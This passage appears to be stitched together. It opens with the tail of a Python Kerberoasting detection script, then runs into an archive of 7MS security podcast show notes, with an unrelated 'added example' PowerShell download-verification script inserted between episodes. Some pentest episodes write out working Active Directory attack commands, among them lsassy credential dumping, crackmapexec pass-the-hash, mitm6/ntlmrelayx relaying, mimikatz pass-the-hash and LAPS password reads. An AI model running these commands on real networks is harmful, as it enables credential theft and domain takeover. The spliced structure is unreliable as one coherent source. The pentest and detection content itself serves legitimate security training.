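            alerts.append({"rule": "honey_spn", "user": e["user"], "ip": e["ip"],
                           "service": e["service"]})
    # Rule 2: one account asks for many distinct SPNs with RC4 inside a short window.
    per_user = defaultdict(list)
    for e in events:
        if is_candidate(e):
            per_user[e["user"]].append(e)
    for user, evs in per_user.items():
        evs.sort(key=lambda e: e["time"])
        times = [datetime.fromisoformat(e["time"]) for e in evs]
        best, window_start, left = 0, None, 0
        for right in range(len(evs)):            # sliding window over this user's requests
            while times[right] - times[left] > WINDOW:
                left += 1
            distinct = {e["service"] for e in evs[left:right + 1]}
            if len(distinct) > best:
                best, window_start = len(distinct), evs[left]["time"]
        if best >= DISTINCT_SPN_THRESHOLD:
            alerts.append({"rule": "rc4_spn_burst", "user": user, "ip": evs[0]["ip"],
                           "distinct_spns": best, "window_start": window_start})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

    On the sample data only pwned.user trips either rule: six distinct SPNs with RC4 inside a few seconds, plus the decoy. The legacy app's single RC4 ticket, the AES request from jdoe, the krbtgt request and the computer-to-computer ticket all stay quiet, which is the point of the exclusions.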

    7MS #471: Cyber News - Ransomware Should Run Somewhere Edition Jun 09, 2021

    Hey everybody, happy June! Our pal Joe is back to cover some great security stories with us, including:

    • Peloton's leaky API

    • Some Colonial Pipeline discussion (story 1, story 2)

    • Amazon Sidewalk doesn't really share your Internet connection with neighbors/strangers. The Hacker News article doesn't do an awesome job of clearing that up either.


    7MS #470: First Impressions of Meraki Networking Gear Jun 02, 2021

    Today we're doing something new - a first impressions episode of Meraki networking gear. Note: this is not a sponsored episode, but rather a follow up to episode #460 where I talked about throwing all my UniFi gear into the ocean and replacing it with Meraki gear. At the end of that episode I asked if anybody was interested in a "first impressions" of the gear, and it turns out (at least 6) people are interested, so here we are! TLDL:

    Pros

    • Super easy plug-and-play setup
    • The mobile app can control just about everything - ports, SSIDs, Internet on/off timers and more!
    • Verbose logging
    • Top-notch support from experienced technicians

    Cons

    • Cost! Big $$$
    • "Cloud only" - can't install this gear in a LAN-only configuration
    • Client VPN is a bit clunky to setup

    7MS #469: Interview with Philippe Humeau of CrowdSec May 26, 2021

    Hey friends! Today we're talking with Philippe Humeau, CEO of CrowdSec, which is "an open-source massively multiplayer firewall able to analyze visitor behavior & provide an adapted response to all kinds of attacks. It also leverages the crowd power to generate a global IP reputation database to protect the user network."

    I came into this interview not knowing much at all about CrowdSec, so I peppered Philippe with questions such as:

    • What is CrowdSec?

    • What problem does it solve?

    • Who are your competitors?

    • You're open source...so how do you make $? What's your five-year plan?

    • You're dealing with a lot of data and metrics...how are you handling data privacy laws and concerns such as GDPR?

    • What if I fall in love with CrowdSec and want to contribute to making it better?

    It was a really fun, transparent and energetic interview - hope you enjoy it!


    7MS #468: Eating the Security Dog Food - Part 3 May 20, 2021

    Today we continue the series on eating your own security dog food! Specifically, we talk about:

    • Keeping a log and procedure for sanitizing systems

    • Keeping a log and procedure for provisioning systems

    • A big "gotcha" to be aware of when using Windows system dropboxes - make sure the password on your Windows user account doesn't expire, because Splashtop doesn't have any way to update it! To prevent this, set the password not to expire:

    wmic useraccount where "Name='LocalAdminAccount'" set PasswordExpires=false

    • If you want more tips on building pentest dropboxes, check out this series

    Oh, and today's song that I sang obnoxiously is If I Were a Dog.


    7MS #467: How to Succeed in Business Without Really Crying - Part 9 May 12, 2021

    Hey everybody! I stayed in a hotel for the first time in over a year and boy oh boy...I hope I didn't get COVID from the bedsheets!

    Anyhow, on that journey I thought of some things that I think will help your business on the marketing/project management/sales side to be more successful and less annoying. DISCLAIMER: I have no formal training in these areas, but I've been on both sides of the table for a number of years, and I think I'm getting a better idea of what clients do and don't like during the sales process. These things include:

    • Reduce layers of people complexity - don't have 17 of your people on the client intro/pitch call and then ghost them once they actually want to buy something!

    • Keep project management just complicated enough - I like project management tools and spreadsheet task-trackers like Smartsheet but I'm trying to let the client lead as far as how much detail they need when tracking their projects. By default, we create a document with a high level map of project milestones, timelines and key contact information. We update that as often as the client likes.

    • Personalize responses to Web leads - if you have an info@ or sales@ address for your business, I think you should personalize the response you give folks who write in. They wrote you for a reason! Don't just copy/paste some generic "Hey you wanted info about our company so here it is blah blah blah" response, that doesn't make people feel like you give a rip about their needs. Think of something personal to say in the reply. "Oh, I see you're in Minnesota. I'm a big Twins fan!" Something like that. Simple, easy and personal.

    • Don't sign people up for junk without asking - in this episode I give an example of a vendor we looked at (but didn't select) for some services, and the company decided to automatically sign ups up for a bunch of electronic and paper mailings. That's super annoying!

    • Don't stink at LinkedIn - in the last episode of this series, I told you about a guy who (to me) wins LinkedIn and the Internet because he sent me a personalized video LinkedIn invitation - it was awesome! Be more like that guy, and less like the mosquitoes who send invites like "Hi, I noticed you're human and figured we should be LinkedIn BFFs" and then sign you up for a non-stop barrage of sales pitches!

    • Bug people "just enough" - if you've had an awesome scoping call for a potential project and the client has received and reviewed the SOW, stay in touch with them periodically - even if it feels like you're being ghosted.


    7MS #466: Attacking and Defending Azure AD Cloud (CARTP) May 05, 2021

    Welp, I need another security certification like I needed a bunch to the retinas, but even after all the fun (and pain) of CRTP I couldn't help but sign up for the maiden voyage of Attacking and Defending Azure AD Cloud - a.k.a. CARTP. This cert comes to us from our friends over at Pentester Academy, and is all about pwning things in Azure AD which is mostly new ground for me.

    In this episode I talk about some of the TTPs covered in week 1 of this course, as well as:

    Likes:

    • Courses offered on Saturday (I'm usually pooped for these sessions, but it's easier than taking time during the work week)

    • Student portal - and especially the student guide! - is more polished, easy to read, and easy to copy/paste from.

    Dislikes:

    • On Saturdays I'm a sleepy Brian. :-)

    • I still wish the course was designed such that we would go through various hands-on-keyboard exercises with the instructor, not just watch.

    • Use of Discord as main comms channel - it causes anxiety for me...too many blips and bloops and blurps with all the notifications. It's also frustrating that the instructor takes questions from Discord sometimes without repeating the question, thus making it hard to figure out what everybody was talking about if I watch the Zoom replay.


    7MS #465: Cyber News - The FBI Might Be Getting Into the IR Biz Edition Apr 28, 2021

    Hey friends! Today Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I talk about some of our favorite news stories, including:

    • FBI removes hacker back doors
    • NSA: 5 security bugs under active nation-state cyberattack
    • Ubiquiti is accused of covering up a ‘catastrophic’ data breach — and it’s not denying it. On a side note, enjoy our podcast about how we lost our love for Ubiquiti a while back: 7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean
    • Codecov users warned after backdoor discovered in devops tool

    7MS #464: Interview with Christopher Fielder of Arctic Wolf Apr 22, 2021

    Today our friend Christopher Fielder of Arctic Wolf joins us on the show again (check out his first appearance in episode #444) - this time to talk about the security journey, and how to start out in your "security diapers" and mature towards a stronger infosec program. Specifically, we talk about:

    • When the company has one person in charge of IT/security, how can you start taking security seriously without burning this person out? First, it's probably a good idea to take note of what you have as far as people, tools and technology to help you meet your security goals.

    • Early in this process, you should inventory what you have (see CIS controls) so you know what you need to protect. A few tools to help you get started:

      • Nmap
      • Rumble
      • LanSweeper
      • Witnessme
    • As you go about any phase of your security journey, don't ever think "I'm good, I'm secure!"

    • Quarterly/yearly vulnerability scans just won't cut it in today's threat landscape - especially for your external network. Consider scanning it nightly to catch show-stoppers like Hafnium early.

    • Limiting administrative privileges is SUPER important - but don't take our word for it, check out this report from Beyond Trust for some important stats like "...enforcing least privilege and removing admin rights eliminates 56% of critical Microsoft vulnerabilities."

    • Install LAPS, because if an attacker gets local admin access everywhere, that's in many ways just as good as Domain Admin!

    • Train your users on relevant security topics. Then train them again. Then....again. And after that? Again.

    • There are many ways to conduct tabletop exercises. They don't have to be crazy technical. Start with the internal tech teams, practice some scenarios and get everybody loosened up. Then add the executives to those meetings so that everybody is more at ease.

    • How do you know when it's time to ask for help from an outside security resource?

    • Not sure what kind of shape your company's security posture is in? Check out Arctic Wolf's free security maturity assessment.


    7MS #463: DIY Pentest Dropbox Tips - Part 5 Apr 14, 2021

    In the last two episodes of this series (#449 and #450) we've been diving into how to not only speed up the process of spinning up a DIY pentest dropbox, but how to automate nearly the entire build process!

    In today's episode we talk specifically about how to streamline the Windows 10 build process. As previously mentioned, this article is awesome for creating a core Win 10 answer file that will format C:, setup a local admin, login once to the configured desktop and then do whatever things you want it to do. Personally, I like having a single batch file get fired off that:

    • Sets the timezone with tzutil /s "Central Standard Time"

    • Stops the VM from falling asleep with powercfg.exe -change -standby-timeout-ac 0

    • Grabs and runs a PS file that does a ton of downloading and unzipping of files with:

    invoke-webrequest https://somesite/somefile.zip -outfile c:\somewhere\somefile.zip
    expand-archive c:\somewhere\somefile.zip -destinationpath "c:\somewhere\extracted\"

    • Installs Windows updates with:

    Install-PackageProvider -name nuget -force
    Install-Module PSWindowsUpdate -force
    Import-Module PSWindowsUpdate
    Get-WindowsUpdate
    Install-WindowsUpdate -AcceptAll -IgnoreReboot

    • Sets a new name for the machine:

    Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so"
    Rename-Computer -LocalCredential administrator -PassThru
    Write-Host "New name accepted!"

    • Does a set of actions depending on the IP range with this code (which stores the machine's IP address in a variable and then does stuff if the machine sits in that subnet):

    $ip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
    if ($ip -like "192.168.0.*") { Invoke-Webrequest https://somesite/somefile.ps1 -OutFile c:\someplace\somefile.ps1 }

    Also, I talk in this episode about how I try to host these "seed" files as securely as possible using Amazon Lightsail instances, the built-in firewall, and LetsEncrypt.


    7MS #462: Pentesting with the Hak5 Key Croc Apr 07, 2021

    Today we talk through our first engagement using Hak5 Key Croc to steal and exfil data. In the past, my internal monologue when a new Hak5 toy is released sounds like this:

    1. "I certainly don't need another Hak5 doo-dad! The last one didn't ever work that great, and ended up in a drawer full of past Hak5 doo-dads that didn't work that great."

    2. "Whaaaaat? A new cool and hip video for the INSERT_CATCHY_HAK5_TOOL_NAME is out? Pffft. I don't need that."

    • 5 seconds go by...
    1. "Well it's just $100, shut up and take my money!"

    2. "It came in the mail today! It has a cool envelope and everything!"

    3. "Hrm, I followed the quick start video and 3 of the 10 steps don't work for me. I'll hit the forums. Huh, everybody seems to be having this problem.

    • 5 days go by...
    1. "Neat! With a little help from SassyGal67 and StarWarsFreak_XXL on the forums, I hacked together my own fix for these issues. Now the core functionality of the device works, but the GUI is totally broken and you have to factory reset it with every use. Cool!"
    • Deep breath. Tosses doo-dad in a drawer full of past Hak5 doo-dads that didn't work that great.

    So with all that said, was our experience with the Key Croc any different? Check out today's episode to find out!


    7MS #461: Tales of Internal Network Pentest Pwnage - Part 26 Mar 31, 2021

    OK I probably say this every time, but I'm gonna say it again: this tale of pwnage is my one of my favs - and not because of the tools/tradecraft, but because of why the company needed our help in the first place. I think I'd file this under the category of "rescue and recovery mission" more than a pentest, but it was a total blast.

    I also cover a few tangents, including how COVID shot #2 gave me nightmares about leprechauns and indirectly caused me to de-pants in front of a large Webinar audience.


    7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean Mar 24, 2021

    Hey friends! Warning: this is not a "typical" 7MS episode where we try hard to deliver some level of security value.

    Instead, today is a big, fat, crybaby, first-world problems whine-fest about how I used to love my UniFi gear for many years, but then a few weeks ago I hit unhealthy levels of rage while working with it...and subsequently completely ripped it all out of the wall and threw it in a plastic bin.

    Let me say it one more time: if you don't like rants of rage, skip this episode and we'll see you next week! If you want to hang in for this clown show, you'll be treated to some of the following highlights:

    • How I did not pirate Boson NetSim

    • How I fell in love with the Edge Router X as an up-and-coming network guru

    • The schedule isn't up, but I'm speaking at Secure360 this year!

    • My shiny new Dream Machine had a really fun issue where one morning Internet service was dead (even though config hadn't changed in weeks), and restoring the SAME config over the RUNNING config fixed the issue. Whaaahhhh?

    • The Dream Machine GUI (at the time) doesn't have all the options one might need to stand up a site to site VPN. Neat.

    • After a firmware update, my wifi started going down from 8:00 a.m. - 8:07 a.m. every morning. Were one of you hacking me? WERE ONE OF YOU HACKING ME!

    • Once I got a BeaconHD, I got a new fun issue where if you were connected to it and submitted a wifi voucher, the Beacon wouldn't properly recognize it and let you on the Internet until about 5 minutes later. Guests loved that! And by "loved that" I mean "hated that."

    • After upgrading UDM firmware again, a new nifty issue popped its head up which broke all my inter-VLAN rules. Yay!

    • I threw hundreds of dollars at new UniFi switches and access points to solve all these problems, and everything worked perfectly (until it didn't).


    7MS #459: Cyber News - Microsoft Exchange Makes the World Cry Edition Mar 17, 2021

    Happy mid-March! Our good pal Gh0sthax joins us today for another hot dish of cyber news! Stories include:

    • Microsoft Exchange cyber attack - Hacker News has a nice what we know so far story, but things have evolved really fast, so make sure you check Microsoft's primary advisory, the script to run on local servers and newer updates such as the recent one-click remediation for unsupported Exchange versions

    • SonicWall zero day - yuck, looks like the SonicWall troubles we talked about recently were a true zero day. In contrast to the Exchange story, it looks like SonicWall's official response offers (frighteningly?) little by way of logs and forensics to tell if you were truly popped. Either way, be sure to patch!

    • Hackers attempt to contaminate Florida town's water supply - the story itself is interesting, but the way it got picked up by some outlets seems to send the message of "TeamViewer = bad" but we think the true lessons learned here are:

      • Out of date and/or unsupported OS = bad
      • Weak credentials = bad
      • Connecting this type of equipment directly to the Internet instead of MFA + VPN = bad

    CISA has a great breakdown of this incident as well.

    • Webshell use has doubled since last year - this article brings back some happy/frustrating OSCP experiences. To better protect your org from being pwned with Web shells, check out NSA's list of vulnerabilities commonly exploited to plant web shells

    • Some great feedback from the last cyber news episode - a podcast listener offered a different take on the "sudo bug that gives root access story" that we discussed last month.


    7MS #458: Interview with Tanya Janca Mar 11, 2021

    Today we're super excited to share a featured interview with Tanya Janca of WeHackPurple!

    Tanya has been in software development from the moment she was of legal age to work in Canada - beginning by working with some huge companies (Nokia/Adobe) before falling in love with application security and eventually starting a company of her own. Gh0sthax and I sat down with Tanya over Zoom to discuss:

    • How to overcome your fears and present at conferences, write blog posts and even start your own company!
    • How to deal with online jackwagons who troll you online at conferences
    • The importance of finding a mentor and mentoring others

    Also, here are a bunch of handy links and hashtags Tanya shares throughout the interview:

    • Bob and Alice Learn Application Security - Tanya's book, available on Amazon
    • Women of Security (WoSEC)
    • We Hack Purple Podcast - weekly podcast with a diverse range of guests from all walks of infosec life
    • We Hack Purple Community - "a Canadian company dedicated to helping anyone and everyone create secure software."
    • Tanya's music on Spotify
    • #CyberMentoringMonday - a hashtag that Tanya and other security professionals monitor to help people connect with cyber mentors
    • InsiderPHd - has a safe space for bug bounty hunters to learn and collaborate
    • WeAreHackerz - "You are welcome to join WeAreHackerz if you identify as a person of a marginalized gender, including but not limited to non-binary individuals, women (trans and cis), trans men, genderqueer, etc. We welcome members across all nationalities, races, religions, ages, or other characteristics that make each of us unique."
    • Security in Color

    7MS #457: Tales of Internal Network Pentest Pwnage - Part 25 Mar 04, 2021

    Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:

    • Get a cmd.exe spun up in the context of your AD user account:
    runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"

    Then get some important info in PowerView:

    • Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!

    • Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!

    • Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!

    Once you know where you have local admin access, lsassy is your friend:

    • lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server

    Did you get an admin's NTLM hash from this dump? Then do this:

    • crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED'

    (Pwn3d!) FTW!


    7MS #456: Certified Red Team Professional - Part 4 Feb 25, 2021

    Hello friends! Today, Joe (Gh0sthax) and I complete our series on CRTP - Certified Red Team Professional - a really awesome pentesting training and exam based squarely on Microsoft tools and tradecraft. Specifically, Joe and I talk about:

    • We don't think the training/exam is for beginners, despite how it's advertised
    • Both the lab PDF and PowerPoint have their own quirks - which may ultimately be teaching us not to be copy-and-paste jockeys, and instead build our own study guides and cheat sheets
    • Don't let the training give you the idea that most pentests have a super fast escalation path to DA (ok yes sometimes they do, but usually we spend a LOT of hours working on escalation!)
    • Watch the walkthrough videos. We repeat: WATCH THE WALKTHROUGH VIDEOS!
    • Although not required, we highly recommend capturing all the flags laid out for you in the lab environment
    • Know how to privesc - using multiple tools/methods
    • It would be to your advantage to understand how to view/manipulate Active Directory information in multiple ways
    • You start the exam with no tools. So how will you be ready to upload/download tools into the exam environment so you make the most of your exam time?
    • Tool X might give you wrong results - or none at all - in the lab. Do you have a backup tool Y and Z that can serve the same purpose?
    • You want to be very good at Kerberos ticket crafting!
    • Know all the mimikatz commands and switches and when to apply them

    7MS #455: Tales of Internal Network Pentest Pwnage - Part 24 Feb 19, 2021

    Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because:

    • I got to use some of my new CRTP skills!

    • Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users:

    Get-DomainUser -PreauthNotRequired
    • Check for misconfigured LAPS installs with Get-LAPSPasswords!

    • The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective!

    • When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!

    • SharpShares is a cool way to find shares your account has access to.

    • I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information

    • Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example:

    sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com

    Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin!

    • Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun!

    • Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$ /user:Administrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crown jewels :-)


    7MS #454: Cyber News - Lets Switch to Typewriters Edition Feb 11, 2021

    Happy almost-mid-February! Today Gh0sthax cooked up some great news stories for us to chew on, including:

    • Sudo bug gives root access to mass numbers of Linux systems!

    • What the heck is hammering with GameStop stock? - this tweet does a great job of explaining it in plain English

    • Solarwinds continues to be a gift that keeps on giving malware-laced gifts that people don't want

    • Sonicwall was hacked using zero days in its own products. After recording this news segment, Sonicwall issued an updated statement on the situation


    7MS #453: Interview with Marcello Salvati Feb 04, 2021

    Today's featured interview is with Marcello Salvati of Black Hills Information Security. Marcello is a.k.a. byt3bl33d3r, and known for his many contributions to the security community. We here at 7MS first became familiar with his work after using CrackMapExec on our penetration tests, and today we sat down with Marcello to discuss:

    • Brian's Chris Farley moment with Marcello

    • Marcello's infosec origin story

    • CrackMapExec, how it came to be, how it was named, and what's coming in the new version of CME

    • Marcello's decision to create Porchetta Industries as a community to provide "support to open source infosec/hacking tool developers and helps them succeed with their own Github sponsorships." Marcello welcomes you to follow Porchetta Industries on Twitter and Discord.

    • What does Marcello do when he's not pentesting and coding? And does he ever get tired of pentesting and coding?

    • What the heck is Nim and why is Marcello so excited about OffensiveNim?


    7MS #452: Enterprise Attacker Emulation and C2 Implant Development Jan 28, 2021

    Hey everyone! Hope you're having a great week. Today Gh0sthax and I do a brain dump and recap of a cool (and mind-exploding) course we took last week called Enterprise Attacker Emulation and C2 Implant Development. In the tangent department, we also touch a bit on:

    • The Fargo TV series
    • Our upcoming interview with Marcello (a.k.a. byt3bl33d3r) from BHIS
    • This Key and Peele sketch
    • I just took my CRTP exam, which we've talked about a lot in the past
    • 7MS is trying to up its pentest game by learning how to write beacons/implants. One project that's really cool in this respect is from MrUn1k0d3r

    7MS #451: Deep Freeze Jan 22, 2021

    Today we talk about a cool product called Deep Freeze, which, as its name implies, can "freeze" your computer in a known/good/frozen state. Then you can do whatever the flip you want to the machine (install icky things, tamper with C:\windows, pack your browser full of shady plugins, and more!), and then just reboot to restore!

    Note: this is not a sponsored episode, but will probably sound like one because I really dig this product and think you might too :-)


    7MS #450: DIY Pentest Dropbox Tips - part 4 Jan 15, 2021

    Hey friends! We're continuing our series on pentest dropbox building - specifically playing off last week's episode where we started talking about automating the OS builds that go on our dropboxes. Today we'll zoom in a little closer and talk about some of the specific scripting we do to get a Windows 2019 Active Directory Domain Controller installed and updated so that it's ready to electronically punch in the face with some of your mad pentesting skills! Specifically, we talk about these awesome commands:

    tzutil /s "Central Standard Time" - this is handy to set the time zone of your server build

    powercfg.exe -change -standby-timeout-ac 0 will stop your VM from falling asleep

    Invoke-WebRequest "https://somesite/somefile.file" -OutFile "c:\some\path\somefile.file" is awesome for quickly downloading files you need. Couple it with Expand-Archive "C:\some\path\some.zip" "c:\path\to\where\you\want\to\extract\the\zip" to make auto-provisioning your toolkit even faster!

    Don't like it that Server Manager loves to rear its dumb head upon every login? Kill the task for it with Get-ScheduledTask -TaskName ServerManager | Disable-ScheduledTask -Verbose. Byeeeeee!!!!

    I love Chrome more than I love IE/Edge, so I auto install it with:

    $Path = $env:TEMP
    $Installer = "chrome_installer.exe"
    Invoke-WebRequest "http://dl.google.com/chrome/install/375.126/chrome_installer.exe" -OutFile $Path\$Installer
    Start-Process -FilePath $Path\$Installer -Args "/silent /install" -Verb RunAs -Wait
    Remove-Item $Path\$Installer

    Now get all the Windows updates!

    Install-PackageProvider -name nuget -force
    Install-Module PSWindowsUpdate -force
    Import-Module PSWindowsUpdate
    Get-WindowsUpdate
    Install-WindowsUpdate -AcceptAll -IgnoreReboot

    Then rename your machine:

    Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so"
    Rename-Computer -LocalCredential administrator -PassThru
    Write-Host "New name accepted!"

    When you're ready to install Active Directory, you can grab the RSAT tools:

    Write-Host "Lets install the RSAT tooleeeage!"
    add-windowsfeature -name rsat-adds

    And then the AD domain services themselves:

    Write-Host "Now lets install the AD domain services!"
    add-windowsfeature ad-domain-services

    Then install the new forest:

    install-addsforest -domainname your.domain -installdns -DomainNetbiosName yourdomain
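
    The download-and-unzip step in the #463 and #450 build scripts above pulls a "seed" file from a host you control and then runs it with admin rights, so the one thing worth adding to it is an integrity check. The script below is an added example, not code from the show notes: it refuses non-HTTPS URLs, pins the SHA-256 of the archive you published, deletes the file on a mismatch, and only then expands it. It also gates the download on the subnet the box landed in, using Get-NetIPAddress in place of the ipconfig | findstr parse. The URL, paths, subnet and hash are placeholders you would replace with your own.

```powershell
# Added example (not from the 7MS show notes): verified seed-file fetch for a
# dropbox build script. Hostname, paths, subnet and hash are placeholders.

$SeedUrl      = 'https://seed.example.invalid/dropbox/tools.zip'   # assumed URL
$SeedPath     = Join-Path $env:ProgramData 'dropbox\tools.zip'
$ExtractPath  = Join-Path $env:ProgramData 'dropbox\tools'
$ExpectedHash = '<SHA256-OF-THE-ZIP-YOU-PUBLISHED>'                # placeholder
$BuildSubnet  = '192.168.0.*'                                      # assumed subnet

function Get-PrimaryIPv4 {
    # First non-loopback, non-APIPA IPv4 address on the box.
    Get-NetIPAddress -AddressFamily IPv4 |
        Where-Object { $_.IPAddress -notlike '127.*' -and $_.IPAddress -notlike '169.254.*' } |
        Select-Object -First 1 -ExpandProperty IPAddress
}

function Get-VerifiedSeedFile {
    param(
        [Parameter(Mandatory)] [string] $Url,
        [Parameter(Mandatory)] [string] $OutFile,
        [Parameter(Mandatory)] [string] $Sha256
    )
    New-Item -ItemType Directory -Force -Path (Split-Path $OutFile) | Out-Null

    # The archive is executed with admin rights later, so plaintext HTTP is refused.
    $scheme = ([Uri]$Url).Scheme
    if ($scheme -ne 'https') {
        throw "Refusing to fetch seed file over $scheme; use https."
    }

    Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing

    # Get-FileHash returns upper-case hex; normalise the pinned value the same way.
    $actual = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
    if ($actual -ne $Sha256.ToUpperInvariant()) {
        Remove-Item -Path $OutFile -Force
        throw "Hash mismatch for $Url (got $actual); not expanding it."
    }
    return $OutFile
}

$ip = Get-PrimaryIPv4
if ($ip -like $BuildSubnet) {
    $zip = Get-VerifiedSeedFile -Url $SeedUrl -OutFile $SeedPath -Sha256 $ExpectedHash
    Expand-Archive -Path $zip -DestinationPath $ExtractPath -Force
    Write-Host "Seed file verified and extracted to $ExtractPath"
}
else {
    Write-Host "Machine is at $ip, outside $BuildSubnet; skipping seed download."
}
```

    Pinning the hash in the script means a swapped archive on the seed host (or a hostile network between the dropbox and the host) fails the build instead of silently running on the box; when you republish tools.zip you update $ExpectedHash alongside it.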

    7MS #449: DIY Pentest Dropbox Tips - Part 3 Jan 07, 2021

    Happy new year! This episode continues our series on DIY pentest dropboxes with a focus on automation - specifically as it relates to automating the build of Windows 10, Windows Server 2019, Kali and Ubuntu VMs. Here's the resources I talk about in more detail on today's episode that helps make the automagic happen:

    Windows VMs

    This article from Windowscentral.com does a great job of walking you through building a Windows 10 unattended install. A key piece of the automation is the autounattend.xml file, which you can somewhat automatically build here, but I think you'll want to install the Windows System Image Manager to really get in the tech weeds and fully tweak that answer file. The handy AnyBurn utility will help you make ISOs out of your Windows 10 / Server 2019 customized builds.

    Ubuntu VMs

    I set out to build a Ubuntu 18.x box because Splashtop only supports a few Linux builds. I found a freakin' sweet project called Linux unattended installation that helps you build the preseed.cfg file (kind of like the Windows equivalent of an answer file). The area of preseed.cfg I've been spending hours dorking around with is:

    d-i preseed/late_command string \

    Under this section you can customize things to your heart's content. For example, you could automatically pull down and install all OS packages/updates and a bunch of third party utils you want:

    in-target sh -c 'apt-get update'; \
    in-target sh -c 'apt-get upgrade -y'; \
    in-target sh -c 'apt-get install curl dnsrecon git net-tools nmap openssh-server open-vm-tools-desktop python3.8 python3-pip python-libpcap ubuntu-gnome-desktop unzip wget xsltproc -y'; \

    Finally, the project provides a slick script that will wrap up your Ubuntu build plus an SSH key into a ready-to-go ISO:

    build-iso.sh ~/.ssh/id_rsa.pub ~/Desktop/My-kool-kustomized-Ubuntu.iso

    Awesome!

    Kali VMs

    There is some decent documentation on building a preseed.cfg file for Kali. But the best resource I found with some excellent prebuilt config files is this kali-preseed project.

    Once your seed file is built, it's super easy to simply host it on a machine in your network and let Kali pull it during install. For example, if you've got a Linux box with Python on the network at 192.168.0.7, just make a temporary folder with the preseed.cfg file in it and then run:

    sudo python3 -m http.server 80

    Then, in your virtual environment, create a new VM and boot it to a Kali NetInstaller image. At the splash screen, hit Tab and it'll display a command line you can edit. Remove the part that says something like preseed/file=/cdrom/simple-cdd/default.preseed, add auto=true and then the URL path to your preseed file, such as url=http://192.168.0.7/preseed.cfg. Kali will then ask a few questions, such as a username and hostname to configure, and if you're watching the machine hosting preseed.cfg, you'll see your Kali machine grab the config file and take care of the rest from there!

    Got a better/cooler/funner/faster/awesomer way to do this type of automation? Let us know!


    7MS #448: Certified Red Team Professional - Part 3 Dec 30, 2020

    Today, Gh0sthax and I talk about week 3/4 of the CRTP - Certified Red Team Professional training, and how it's kicking our butts a bit. Key points include:

    • We agree this is not a certification for folks who are new to pentesting

    • Don't expect to be following along "live" with the instructor during the training sessions

    • You'll need to do a flippin' ton of studying and practicing on your own in between the live sessions

    • As you follow along with the lab exercises, some things won't work - and that might be by design, but the lab manual might not give you a heads-up. In those cases, be sure to check with your classmates in the Discord channel

    • Problems popping shells? Hint: it might not be a problem with your tools...but with your network/firewall config!

    • The more PowerShell skills you can walk into this training with, the better.

    • We got to play with some tools that were new(ish) to us:

      • PowerUpSQL - check out these awesome cheat sheets too!
      • HeidiSQL
      • Rubeus
    • If you're an absolute rockstar in the pentest labs, don't think that you'll breeze right through the exam!

    • Some pros of this training: fast-moving, super knowledgeable instructor. Outstanding content. Super value for the dollar investment - arguably the best pentest training bang for the buck. The labs themselves are quite good and realistic. You get the recordings of the live sessions after they're complete. The course covers some defense against these attacks as well - great to have the blue team perspective!

    • A few cons: the content might be too fast-moving. It can get easy to become "lost" and forget the objective of what each lab exercise is having you do. Lab manual doesn't necessarily match the PDF slides.


    7MS #447: Cyber News - The End of 2020 as We Know It Edition Dec 23, 2020

    Merry Christmas! Happy holidays! Please enjoy the last cyber news edition of 2020, brought to us by our good pal Gh0stHax. Stories covered include:

    • You've probably heard this by now, but FireEye had a breach that was truly sophisticated. Here's a really nice plain English breakdown of the situation for folks who may not be interested in the deep technical details.

    • Chris Krebs, former CISA director, sues Trump campaign lawyer after death threats

    • CSOOnline has a nice article on 4 security trends to watch for in 2021 which we may or may not agree with!


    7MS #446: Certified Red Team Professional - Part 2 Dec 17, 2020

    Today's episode continues part 1 of our series on the Certified Red Team Professional certification. Key points from today's episode include:

    • It's probably a better idea to run Bloodhound on your local machine so you don't crush the student VM's resources

    • Running Invoke-Command is one of my new favorite things. Check this post for a bunch of cheatsheet tips for running commands in PowerShell against other hosts.

    • Silver, gold and skeleton key attacks in AD - are they awesome? Yes. Do I see myself using those in short-term pentest engagements? Meh.

    • Wanna build a home lab to do some of this fun pentest stuff? Our buddy k3nundrum in Slack recommended we check out this. It looks awesome. And the devs of the tool have a video on it here.

